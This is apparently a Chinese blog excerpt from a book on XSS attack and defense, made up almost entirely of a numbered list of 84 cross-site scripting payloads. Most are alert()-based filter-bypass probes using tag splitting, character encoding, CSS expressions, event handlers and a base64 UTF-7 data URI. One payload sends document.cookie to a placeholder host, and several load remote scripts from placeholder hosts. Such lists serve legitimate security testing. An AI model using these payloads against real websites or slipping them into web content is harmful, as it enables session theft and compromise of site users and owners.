摘录于《XSS跨站脚本攻击剖析与防御》,希望大家支持正版,写的还是不错的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
<script>alert(1);</script>
<script>alert('xss');</script>
<script src="xxx://xxx.xxx"></script>
<script>location.href="xxx://xxx.xx/cookie="+escape(document.cookie)</script>
<scr<script>ipt>alert('xss');</scr<script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=xx.png onerror=alert(/xss/) />
<style>@im\port'\ja\vasc\ript:alert(\"xss\");</style>
<?echo('<scr)';echo('ipt>alert(\"xss\")</script>');?>
<marquee><script>alert('xss')</script></marquee>
<IMG SRC=\"jav&#x09;ascript:alert('xss');\">
<IMG SRC=\"jav&#x0A;ascript:alert('xss');\">
<IMG SRC=\"jav&#x0D;ascript:alert('xss');\">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"<script>alert(0)</script>
<script src = xxx.xxx.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"javascript:alert('xss')\">
<IMG OYNSRC=\"javascript:alert('xss')\">
<font style='color:expression(alert(document.cookie))'>
');alert('xss
<img src="javascript:alert('xss')">
<script language="JavaScript">alert('xss')</script>
[url=javascript:alert('xss');]click me[/url]
<body onunload="javascript:alert('xss');">
<body onLoad="alert('xss');">
[color=red' onmouserover="alert('xss')"]mouser over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("xss");
<div style="x:expression((window.r==1)?"eval('r=1;alert(String.fromCharCode(88,83,83));'))">
<iframe<?php echo chr(11)?>onload=alert('xss')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>xss</h1></marquee>
'">><marquee><h1>xss</h1></marquee>
'">><script>alert('xss')</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('xss');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;URL=http://;URL=javascript:alert('xss');\">
<script>var var = 1:alert(var)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert('xss')")}</STYLE>
<?='<SCRIPT>alert("xss")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"xss\")'>
"onfocus=alert("xss")"><"
<FRAMESET><FRAME SRC=\"javascript:alert('xss');\"></FRAMESET>
<STYLE>li{list-style-image:url(\"javascript:alert('xss')\");}</SYTLE><UL><LI>XSS
<br size=\"&{alert('xss')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert(1))>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("xss")>
[color=red width=expression(alert(123))][color]
<BASE HREF="javascript:alert('xss');//">
Excute(<MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(1)</script>
<body onLoad="while(true) alert('xss');">
'"></title><script>alert(111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript">alert(x \nS \nS);</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert('xss');">
'></script><script>alert(1)</script>
<script+src=">"+src="http://xx.xx/xx.js"></script>
'>"><script src = "xxx.xxx/xss.js"></script>
}</style><script>a=eval;b=alert;a(b(/xss/.source));</script>
<SCRIPT>document.write("xss")</SCRIPT>
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='><script>alert("xss")</script>
<body background=javascript:'"><script>alert(1)</script>></body>
">/XaDos/><script>alert(1)</script><script src="xxxx.xxxx/xx.js"></script>
Data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlenQoMTMzNyk8L3NjcmlwdD4=  
上面的解密后   "></title><script>alert(1337)</script> 注意utf-7
"<marquee><img src=x.png onerror=alert(1)/>
'"><marquee><img src=x.png onerror=alert(1)/>
</div><script>alert(1)</script>
"><iframe src='javascript:alert(1)'></iframe>
<div style="background:url('javascript:alert(1)')">
<img src='java\nscript:alert(1)'>
>"'><img src="javascript:alert(1)">
" style="background:url(javascript:alert(/xss/))"
>"><script>alert(/xss/)</script>
"></title><script>alert(1)</script>
'"</title><font color=red onmouseover=javascript:alert(1)>xss</font>
<SELECT NAME="" onmouerover=alert(1)></select>